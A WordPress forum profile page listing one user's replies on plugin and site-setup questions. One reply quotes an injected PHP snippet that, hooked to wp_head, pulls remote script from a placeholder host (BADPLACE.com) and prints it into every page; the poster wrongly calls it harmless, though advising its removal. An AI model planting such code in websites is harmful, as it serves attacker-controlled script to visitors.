Maurisource
Forum Replies Created
-
Forum: Plugins
In reply to: [Yoast SEO] Can Yoast SEO be made to work with plugins such as Page Builder?Hi, I love your plugin, simply for saving my time with custom block layout name that I don’t have to remember anymore.
Well I have a question for you GREG. I have version 1.1.6 and I’m having the same issue, but why I can’t simple hit UPDATE plugin, it doesn’t seem to be in WP repository. Am I correct? Is it something you guys are working on, or your plugin is OFF WP repository as a free plugin?
Thanks.
Forum: Fixing WordPress
In reply to: 403 Forbidden nginx on my headerHey guys, this is not a Hack.
I’ve been getting the same problem, but only difference i’ve been working on LocalHost on a Mac. Definitely it wasn’t hacked.
So I’ve investigated further:
Indeed the problem comes from jquery-1.6.3.min.js.
But problem appeared after using Gravity form plugin in WP.
Some plugins force the usage of Jquery, but WP with any theme comes already with Jquery enabled. So you can safely remove this piece of code:
<?php if (!function_exists(‘insert_gravity’)){function insert_gravity(){if (function_exists(‘curl_init’)){$url = “https://www.BADPLACE.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_gravity’);} ?>
And replace it with:
<?php ?>
Or disable Gravity form plugin.
Forum: Plugins
In reply to: [WP safely disable directory browsing] How does it work?Hi, sorry for late reply. Of course you can display any files from your upload folder if you paste in the direct link. (Otherwise your website wouldn’t load up as all content would be blocked by the plugin)
This plugin prevent directory browsing, it doesn’t prevent your files from loading. For example someone who don’t have a full link to the .PDF file won’t be able to browse your server or the /Upload folder to look for it.
I hope you understood my explanation about the concept of this plugin.
PS: If you don’t want direct access to your PDF, install S2member for example, it requires a user registration to access specified files.
Forum: Fixing WordPress
In reply to: How do we restrict access to my wp-content/uploads directory?I’m proud to say that I have written a small plugin to easily fix your issue. No need to play in the code, with 5 lines of code this plugin will safely secure your Wp-Content directory and all subfolders in there (including /Uploads or /Media).
You can download it here: https://www.ads-software.com/extend/plugins/wp-safely-disable-directory-browsing/
I appreciate if you could leave a rating for this afterwards.Thank you.
Forum: Installing WordPress
In reply to: Can I build my site offline?I don’t know if you can help me, but I clearly want to put my wordpress website in an offline mode while I can still build it and access it’s frontend with a different extension. Is it possible to do that? Normally with my non wordpress websites I use to put an empty index.html file in the root folder where index.php is. And by priority my server won’t display my front-end. I want to do the same thing with wordpress. Any help would be very appreciated.
John P – CEO Création site internet
Forum: Plugins
In reply to: [Promotion Slider] [Plugin: Promotion Slider] image autoresizeTried it out woodent and works like a Charm! THanks for that css trick.
[sig moderated as per the Forum Rules. Stop posting links to your site!]
Thx Pat, this works like a charm. Glad to see that i’m not alone having the same issue.
[sig moderated as per the Forum Rules. Stop posting links to your site!]
Forum: Plugins
In reply to: [Facebook Connect] [Plugin: Facebook Connect] Am i missing something?does anyone know how to add the facebook button in a marquee?
[sig moderated as per the Forum Rules. Second warning.]
Forum: Plugins
In reply to: Change page number buttonI’m writing to you in order to know if you had found a solution? If yes, share a piece of it with us? Thanks.
[sig moderated as per the Forum Rules]